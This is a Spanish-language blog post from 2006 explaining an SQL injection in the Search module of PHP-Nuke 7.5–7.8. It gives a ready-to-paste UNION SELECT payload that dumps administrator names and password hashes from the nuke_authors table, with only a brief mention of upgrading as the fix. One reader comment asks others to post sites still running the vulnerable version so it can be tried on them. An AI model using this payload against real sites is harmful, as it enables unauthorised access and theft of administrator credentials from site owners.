Tue 21 Feb 2006
Sql Injection en Php-Nuke 7.5 - 7.8
Posteado por Fr33styl3Nuevo bug para Php-Nuke, originalmente publicado por Janek Vind.
Esta vez la vulnerabilidad se encuentra en el modulo "Search" de las versiones 7.5-7.8. Nuevas versiones o anteriores no son vulnerables por estar programadas de otra manera.
Bueno.. como se explota?? Muy facil… dentro del modulo Search (www.sitiovulnerable.com/modules.php?name=Search)
Se completa en el campo buscar lo siguiente (sin las comillas):
"p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* "
y si todo anda bien tendremos una lista de los admis y los hashs de sus pass.
.::Solución::.
Actualizar a la version 7.9 o modificar la parte del codigo vulnerable ( es solo una linea )
Prueben, pero no dañen… recuerden avisar al webmaster una ves encontrado el bug.
2 Responses to “Sql Injection en Php-Nuke 7.5 - 7.8”
Leave a Reply
You must be logged in to post a comment.
April 23rd, 2006 at 12:45 am
si alguno conoce alguna pagina que tenga esta version, escribanla porque no encuentro ninguna
May 11th, 2006 at 4:00 pm
Jajaja AMigo!Muy Bueno..Pero tengo una duda..Vi otros Tutoriales Con Unos codigos de 5000 Lineas..Como codigos de programacion Siempre para PHPBB2 pero no c dond los tengo q poner..Me podrias Ayudar?Grax!